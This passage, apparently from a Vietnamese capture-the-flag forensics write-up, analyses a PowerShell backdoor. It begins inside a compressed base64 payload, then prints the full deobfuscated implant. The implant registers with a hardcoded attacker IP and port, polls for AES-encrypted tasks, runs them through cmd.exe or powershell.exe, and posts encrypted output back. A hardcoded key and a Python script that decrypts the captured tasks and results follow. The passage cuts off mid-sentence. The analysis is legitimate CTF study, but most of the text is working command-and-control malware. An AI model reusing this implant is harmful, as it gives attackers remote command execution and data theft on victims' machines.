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' ) , [iO.COmpreSSIOn.cOMPrEssionmode]::decOMpReSS )|% {nEW-OBJeCT Io.StREamreadEr($_,[TEXt.enCoDInG]::AsciI )} ).reAdToENd() ``` Tải file về thì máy báo là file có virus 🥲 nên mình copy rồi dùng cyberchef để decode base64 và giải nén. ```powershell ${8r`T3WA} = [tyPe]("{1}{8}{4}{6}{5}{9}{2}{3}{0}{7}"-F 'd',("{0}{1}"-f 'syS','TEm'),("{1}{0}"-f'ERM','h'),'O',("{0}{1}"-f 'eCUrI','tY'),("{0}{1}" -f 'h','Y.Ci'),("{0}{1}{2}" -f '.cry','P','TOGRap'),'e','.s','p') ;.('SV') ("{0}{1}"-f '72','j5O') ( [TYpe]("{9}{1}{4}{0}{8}{10}{6}{12}{7}{11}{3}{2}{5}" -F 'TY',("{1}{2}{0}" -f 'eC','Yst','em.s'),'Od','m','uri','e','p','Di',("{0}{1}" -f'.','cRY'),'s',("{2}{1}{0}"-f 'Y.','toGRapH','p'),'ng','aD') ) ; ${X`NfD}=[tyPe]("{2}{0}{1}{3}"-f 'te',("{0}{1}"-f'm','.cONV'),'Sys','ErT') ; ${H`LvW1} = [tYPe]("{2}{4}{3}{5}{1}{0}" -f 'iNG',("{0}{2}{1}" -f 't','Od','.EnC'),'S',("{1}{2}{0}"-f '.t','S','tEM'),'Y','EX'); .("{0}{2}{1}" -f'SeT','m',("{0}{1}"-f'-iT','e')) (("{0}{1}"-f 'vA','RI')+("{0}{1}" -f 'a','bLE')+("{1}{0}" -f'y7',':92')) ( [Type]("{1}{2}{0}" -F ("{1}{0}{2}"-f 'NEt.dn','eM.','S'),'Sys','t')) ; ${U`JX`Rc}=[tyPE]("{1}{2}{0}" -F 'nG','Str','i') ;function Cr`EATe-`AeS`manA`GeDo`B`Je`Ct(${vx`ZT`mff}, ${5`T`MRWpLUy}) { ${AJuJ`V`RAZ`99} = .("{1}{2}{3}{0}"-f 't',("{0}{1}" -f'Ne','w-'),("{1}{0}" -f 'e','Obj'),'c') ("{7}{9}{8}{0}{10}{2}{6}{5}{3}{11}{1}{4}"-f 'ty','nag',("{0}{2}{1}" -f 'Cry','o','pt'),'y','ed','ph','gra',("{0}{1}"-f'Sy','stem.'),("{0}{1}"-f 'ecur','i'),'S','.',("{0}{2}{1}" -f'.','sMa','Ae')) ${AJUjvr`AZ`99}."Mo`de" = ( .("{1}{2}{0}" -f 'lE',("{1}{0}" -f't-vA','gE'),("{1}{0}" -f'Ab','RI')) ("8rt"+"3Wa") -Value )::"c`Bc" ${aJuj`V`RAZ99}."PA`d`dInG" = ( .("{0}{1}"-f 'Di','r') ("{2}{3}{0}{1}"-f'le:72j5','o','v','ARIab') )."VA`LUe"::"ze`Ros" ${A`JUJvr`Az`99}."Bl`O`ckSizE" = 128 ${Aju`Jv`RAz`99}."keysI`ze" = 256 if (${5`TM`RWPluy}) { if (${5`TmR`WpLuy}.("{0}{1}{2}" -f ("{1}{0}"-f 'tT','ge'),'y','pe')."iNV`O`ke"()."n`AME" -eq ("{0}{2}{1}" -f 'St','g','rin')) { ${a`j`U`jvRaZ99}."Iv" = (&("{1}{0}"-f'r','di') ("{0}{1}{2}{3}" -f 'va','RI','aB','le:xNFd'))."vAl`Ue"::("{1}{2}{3}{0}"-f 'ing','Fro',("{1}{0}{2}" -f'se','mBa','64'),'Str')."In`VOKe"(${5TMRW`Pl`Uy}) } else { ${ajUj`VraZ`99}."I`V" = ${5tmRw`PL`Uy} } } if (${Vx`ZtM`FF}) { if (${VXz`T`mfF}.("{1}{2}{0}" -f ("{1}{0}"-f'e','Typ'),'g','et')."I`NvoKe"()."n`AME" -eq ("{1}{0}" -f 'ing','Str')) { ${ajU`j`VraZ99}."K`ey" = ( &('LS') (("{0}{1}"-f'V','ariAb')+'l'+("{0}{1}" -f 'e:XN','F')+'D') )."vA`luE"::("{1}{0}{2}{3}"-f'e',("{1}{0}" -f'as','FromB'),'64S',("{1}{0}" -f 'ng','tri'))."invO`Ke"(${vx`z`TmFF}) } else { ${AjU`J`Vr`AZ99}."k`ey" = ${v`Xz`Tmff} } } ${aJUjvRA`Z`99} } function e`N`CRYpT(${VxzT`M`Ff}, ${RO`FPdq`R`F99}) { ${B`y`TES} = ( .("{1}{0}"-f ("{1}{2}{0}"-f 'e','arI','abl'),'v') (("{1}{0}" -f'lvW','h')+'1') )."vAL`UE"::"u`Tf8".("{2}{0}{1}" -f 'yt','es',("{0}{1}" -f 'G','etB'))."INV`o`kE"(${r`O`FpdQRF99}) ${ajujVR`AZ`99} = .("{4}{0}{2}{5}{3}{1}"-f("{1}{0}" -f'-','eate'),'ct','Ae',("{1}{0}" -f'e','edObj'),'Cr',("{1}{0}{2}"-f 'Ma','s','nag')) ${VX`ZtM`Ff} ${qD`IqL`GaQ99} = ${aJuj`VR`AZ99}.("{1}{2}{0}" -f'or',("{0}{1}{2}" -f'Create','En','c'),("{1}{0}" -f 't','ryp'))."in`VoKe"() ${lw`i`hYmIF99} = ${Qd`i`qLgaq99}.("{3}{4}{1}{0}{2}"-f ("{0}{1}{2}"-f 'nal','Bl','o'),("{1}{0}" -f'mFi','for'),'ck','Tra','ns')."i`NvO`Ke"(${b`yTeS}, 0, ${b`y`Tes}."Le`NgTh"); [byte[]] ${f`J`AxUWQ`N99} = ${A`Ju`jvR`Az99}."Iv" + ${lW`iHYmiF`99} ${aj`UJ`V`RAZ99}.("{1}{2}{0}"-f 'e','Dis','pos')."i`NVO`KE"() ${x`NFd}::"tOBase6`4`S`TRi`NG"."i`Nvoke"(${Fj`A`X`UWqN99}) } function deC`Ry`PT(${VXzt`m`FF}, ${b`KJrxQ`Cf`99}) { ${bYT`Es} = (&("{0}{2}{1}" -f'v',("{0}{1}" -f 'i','able'),'AR') ('xnf'+'d') )."Va`luE"::("{3}{1}{2}{0}" -f ("{0}{1}" -f'r','ing'),'o',("{2}{0}{1}"-f'e6','4St','mBas'),'Fr')."InV`OKE"(${Bk`jRx`qcF99}) ${5t`MR`WpLuY} = ${B`Y`Tes}[0..15] ${aJu`JVra`z99} = .("{0}{2}{4}{3}{1}" -f ("{1}{0}"-f'rea','C'),("{1}{0}"-f 'ect','j'),("{0}{1}" -f't','e-Aes'),'dOb',("{0}{1}{2}"-f'Mana','g','e')) ${VxZTm`FF} ${5TMRw`p`LUY} ${MNDm`WYnB`99} = ${AJ`Ujv`RA`z99}.("{4}{0}{2}{1}{3}" -f'ea','ry',("{0}{1}"-f'te','Dec'),("{0}{1}"-f'p','tor'),'Cr')."In`Voke"(); ${A`htL`MYh`l99} = ${M`ND`mWynB99}.("{0}{3}{1}{4}{5}{2}"-f 'T',("{0}{1}"-f 'fo','rmFi'),("{1}{0}"-f'lock','B'),("{1}{0}" -f's','ran'),'na','l')."i`Nvo`kE"(${b`Y`TES}, 16, ${b`yTeS}."lENg`TH" - 16); ${A`J`UjVRAZ99}.("{1}{0}"-f 'se',("{1}{0}" -f 'spo','Di'))."IN`VO`KE"() ${HLV`W1}::"uT`F8"."G`E`TStri`Ng"(${AhtL`m`Y`hl99})."T`RIM"([char]0) } function Sh`ELL(${DfJz`1co}, ${y`o`8xm5}){ ${Cw`zVY`VJ} = &("{1}{2}{0}" -f 'ct','Ne',("{0}{1}"-f 'w-O','bje')) ("{4}{3}{5}{0}{1}{2}"-f ("{5}{2}{0}{3}{4}{1}"-f'P','I','cs.','roc','essStart','i'),'n','fo',("{0}{1}"-f'ys','te'),'S',("{0}{2}{1}"-f'm.Di','st','agno')) ${Cw`ZVy`Vj}."FIlena`me" = ${DFjZ1`co} ${C`W`zvYvj}."r`eDIRec`TsT`AnDaRdERr`OR" = ${T`Rue} ${cwZ`V`YVJ}."ReDIRE`cT`s`TANdar`DoUTPUT" = ${tR`Ue} ${C`WZv`yVJ}."USEs`hELl`eXeC`U`Te" = ${F`ALsE} ${c`wzvy`VJ}."aRg`UmENtS" = ${yO8`x`m5} ${p} = .("{0}{2}{1}" -f'New',("{1}{0}"-f 'ject','Ob'),'-') ("{6}{0}{4}{3}{1}{2}{5}" -f("{1}{2}{0}" -f 'Dia','yst','em.'),("{1}{2}{0}"-f 'P','o','stics.'),'ro','n','g',("{0}{1}" -f 'ces','s'),'S') ${P}."s`T`ArTiN`FO" = ${C`W`zvYVj} ${p}.("{1}{0}" -f("{1}{0}"-f'art','t'),'S')."INvo`KE"() | &("{2}{1}{0}"-f'l',("{1}{0}" -f'Nul','t-'),'Ou') ${P}.("{2}{1}{0}{3}"-f'Exi',("{0}{1}"-f 'tF','or'),'Wai','t')."inv`oKE"() ${BHnxN`Ur`W99} = ${p}."sta`Ndar`dOu`TpUT".("{2}{0}{1}" -f("{1}{0}" -f 'En','To'),'d',("{0}{1}" -f 'R','ead'))."I`NV`OkE"() ${NmWkj`O`A`B99} = ${p}."St`A`N`dArde`RrOR".("{2}{1}{3}{0}"-f'nd','To',("{1}{0}" -f'd','Rea'),'E')."Inv`o`ke"() ${k`C`NjcQdL} = ('VAL'+'ID '+"$BhnXnUrW99`n$nmWKJOAb99") ${K`cnJcQ`Dl} } ${FZvyCr} = ("{0}{2}{3}{1}" -f '12',("{0}{1}{2}"-f '.2','07',("{1}{0}" -f'20','.2')),'8',("{1}{0}"-f'9','.19')) ${t`wFTrI} = ("{0}{1}"-f'7','331') ${VxzTmff} = ("{2}{1}{4}{6}{3}{0}{7}{5}"-f 'XI',("{0}{1}{2}" -f 'w',("{0}{1}" -f 'jM7','m2'),'c'),("{0}{1}" -f 'd','/3K'),'u','GAt','+M=',("{0}{1}{2}" -f'L','I',("{1}{0}"-f("{1}{0}"-f'lhD','7K'),'6')),("{0}{2}{3}{1}"-f("{2}{1}{0}"-f 'KST','XR','/'),'R',("{0}{1}"-f'k',("{1}{0}"-f'lmJ','O')),("{0}{1}"-f 'XE','42'))) ${n} = 3 ${C`w`j2TWh} = "" ${yC`RU`Tw} = ${9`2Y7}::("{2}{0}{1}"-f("{1}{0}{2}"-f't','etHos','N'),'ame','G')."in`VoKE"() ${F`N`FFGXDzj} = "p" ${D`FctD`FM} = (("{0}{1}" -f'ht','tp') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/reg") ${kV`QBXbuR} = @{ ("{0}{1}"-f 'n','ame') = "$YCRUTw" ("{1}{0}"-f 'pe','ty') = "$fNFFGXDZJ" } ${CWj2`TWh} = (&("{4}{3}{2}{0}{1}"-f '-',("{1}{2}{0}"-f't','W','ebReques'),'ke','nvo','I') -UseBasicParsing -Uri ${d`Fct`DFM} -Body ${k`V`qBxbUr} -Method ("{1}{0}"-f'OST','P'))."co`N`TENT" ${TvYM`e`YrR99} = (("{0}{1}"-f'htt','p') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/results/$cWJ2Twh") ${i`JfySE2} = (("{1}{0}" -f 'p','htt') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/tasks/$cWJ2Twh") for (;;){ ${M`A04XM`gY} = (.("{2}{0}{3}{1}{4}" -f'n',("{0}{1}"-f'q','ues'),'I',("{0}{1}{2}" -f 'voke-W','e','bRe'),'t') -UseBasicParsing -Uri ${I`J`FYSE2} -Method 'GET')."cO`N`TeNt" if (-Not ${UJX`Rc}::("{1}{0}{3}{2}"-f 'l',("{0}{1}"-f'IsN','ul'),("{1}{0}{2}" -f 'mpt','rE','y'),'O')."INvO`Ke"(${M`A04XmGy})){ ${m`A04XM`gY} = .("{0}{1}" -f("{1}{0}" -f 'r','Dec'),'ypt') ${V`XZ`Tmff} ${Ma04X`MgY} ${mA0`4X`MgY} = ${ma0`4`XMgy}.("{1}{0}"-f'it','spl')."INv`okE"() ${FL`AG} = ${MA04`x`mgY}[0] if (${Fl`Ag} -eq ("{0}{1}" -f 'VAL','ID')){ ${WB1`SWYo`je} = ${MA04`X`MgY}[1] ${yO8`X`M5S} = ${Ma0`4XMgY}[2..${MA04x`mgY}."LeNg`TH"] if (${wb1s`Wyo`Je} -eq ("{1}{0}"-f'l',("{1}{0}" -f'hel','s'))){ ${F} = ("{0}{1}{2}"-f 'c',("{1}{0}" -f'e','md.'),'xe') ${y`O`8XM5} = "/c " foreach (${a} in ${yo8`xM`5s}){ ${Yo8`x`m5} += ${a} + " " } ${KcNJ`C`QdL} = .("{0}{1}"-f 'sh','ell') ${f} ${yo`8xM5} ${kCnjCQ`DL} = .("{1}{2}{0}"-f 'pt','Enc','ry') ${VxztM`FF} ${kc`Nj`cqdl} ${kvqbX`B`Ur} = @{("{1}{0}" -f 'lt',("{0}{1}" -f 'r','esu')) = "$KcnJCQDl"} &("{3}{0}{1}{4}{2}" -f'ke','-W',("{0}{1}" -f 'qu','est'),("{0}{1}"-f'I','nvo'),("{1}{0}" -f 'bRe','e')) -UseBasicParsing -Uri ${tV`yM`Ey`RR99} -Body ${k`V`QbXbur} -Method ("{1}{0}" -f 'T','POS') } elseif (${Wb1Sw`Y`OJe} -eq ("{1}{0}{2}"-f 'owe','p',("{2}{1}{0}" -f 'l','l','rshe'))){ ${f} = ("{0}{3}{4}{1}{2}" -f ("{0}{1}"-f'p','owers'),'e','xe','he','ll.') ${yO`8X`m5} = "/c " foreach (${a} in ${Y`o8xM5s}){ ${YO8x`m5} += ${a} + " " } ${kc`Nj`cqdL} = &("{0}{1}" -f 'she','ll') ${F} ${yO`8`XM5} ${k`cn`jCQDL} = .("{0}{1}"-f ("{0}{1}" -f 'En','cr'),'ypt') ${vXZT`mfF} ${KCN`jcqDl} ${KVqb`x`BUr} = @{("{1}{0}"-f ("{0}{1}" -f 'es','ult'),'r') = "$KcnJCQDl"} &("{0}{2}{4}{5}{1}{3}"-f'Inv',("{0}{1}"-f 'WebR','e'),'o',("{1}{0}" -f 'st','que'),'ke','-') -UseBasicParsing -Uri ${tvyMEY`R`R99} -Body ${k`V`qBXb`Ur} -Method ("{1}{0}" -f 'OST','P') } elseif (${wb`1swYO`Je} -eq ("{0}{1}"-f 'sl','eep')){ ${n} = [int]${yO`8Xm`5S}[0] ${kV`Q`BXbur} = @{("{0}{1}"-f're',("{0}{1}"-f 'su','lt')) = ""} &("{2}{0}{4}{1}{3}" -f 'o',("{1}{0}"-f 'Re','Web'),'Inv',("{0}{1}"-f'qu','est'),'ke-') -UseBasicParsing -Uri ${tV`Ymeyr`R`99} -Body ${Kv`QBXBur} -Method ("{1}{0}" -f 'T','POS') } elseif (${wb`1sWy`ojE} -eq ("{1}{0}"-f'e',("{1}{0}"-f'm','rena'))){ ${c`wJ2t`Wh} = ${Y`O8Xm`5S}[0] ${TVY`mey`Rr99} = (("{1}{0}" -f'tp','ht') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/results/$cWJ2Twh") ${ijF`Ys`E2} = (("{1}{0}"-f'ttp','h') + ':' + "//$FZVYCR" + ':' + "$TwFTRi/tasks/$cWJ2Twh") ${kV`Qb`XbUr} = @{("{1}{0}" -f'lt',("{1}{0}" -f 'esu','r')) = ""} .("{0}{1}{4}{2}{3}" -f 'Inv',("{0}{1}{2}" -f'ok','e-','WebR'),'qu','est','e') -UseBasicParsing -Uri ${TVY`mEyR`R`99} -Body ${KvqBxb`Ur} -Method ("{1}{0}"-f 'OST','P') } elseif (${w`B1s`WYOJe} -eq ("{0}{1}" -f 'qu','it')){ exit } } .("{1}{0}"-f 'p',("{0}{1}"-f'sl','ee')) ${N} } } ``` Mình up code đã được deobf ở đây: [link](https://gist.github.com/winndy112/98301e8b602a4e83b61f4b2ce059f811) Flow quan trọng của bài này là nó sẽ lấy `$content` bằng HTTP GET tới địa chỉ ip và port cho trước (điều khiển bởi attacker) với uri là `/task/....` Script này decrypt task và tác vụ sau thực hiện sau khi giải quyết task. ```python= import base64 from Crypto.Cipher import AES def Decrypt(Key, ciphertext): ciphertext_bytes = base64.b64decode(ciphertext) iv = ciphertext_bytes[0:16] ciphertext_data = ciphertext_bytes[16:] aes = AES.new(Key, AES.MODE_CBC, iv) plaintext = aes.decrypt(ciphertext_data) plaintext = plaintext.rstrip(b'\x00') decrypted_data = plaintext.decode('utf-8') return decrypted_data tasks = ["RrzBf9o5vTBf+vInYW3OTzBvvNIWSyyKsx6v25jOD9roPGP4gOhaHPc/u7l804cs", "tp4pZ9OgpI9uxr4sNupHQJE5hBlTVd7NbIK21rjApBf15tj9AuNo6OU/zJ/K3REi", "bK2FX23ydWGbJNdJliRrDqjOE17p1YakRt2cjgaRJJv0zAVVro+Gq1waD0ui+lCe", "uGjyY6GcnabYem8450v+e256asufK4JUhfW5/KQfyPeAIkmBiQcwBoQbI8z7v9NLyH9Gwi4k6ViFL0nMTCGGWS0TSS6vqWRHa4ADkfcaVFhcjLmBV23dnOfSoCGUWzCg4TBcpDtc+C4QOc/v+dZSL2ytww2c8+pY1dGwth89dVWej8qifotdP0I9p3f/WNCf", "rQp9Lo1Cuh3mvS45DF0m5ZG1lhW4/Jb7T608IpAS5GwBurTGeJ5oomIhg1jHo1x4dLqcRnsNYqKU7cj8gGXkQA==", "eq/gZMmuX1cPWZYJ9iQcSi3P1KYsOFCwdkD/L8i6HSGn7yWmXk8YxGN96VndokXT"] key = "d/3KwjM7m2cGAtLI67KlhDuXI/XRKSTkOlmJXE42R+M=" key = base64.b64decode(key) decrypt_task = [] result_post = ["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"] result_post_decrypted = [] for task, res in zip(tasks, result_post): decrypt_task.append(Decrypt(key, task)) result_post_decrypted.append(Decrypt(key, res)) print(decrypt_task[-1], '\n', result_post_decrypted[-1] ``` Từ output, ta có flag từ chuỗi 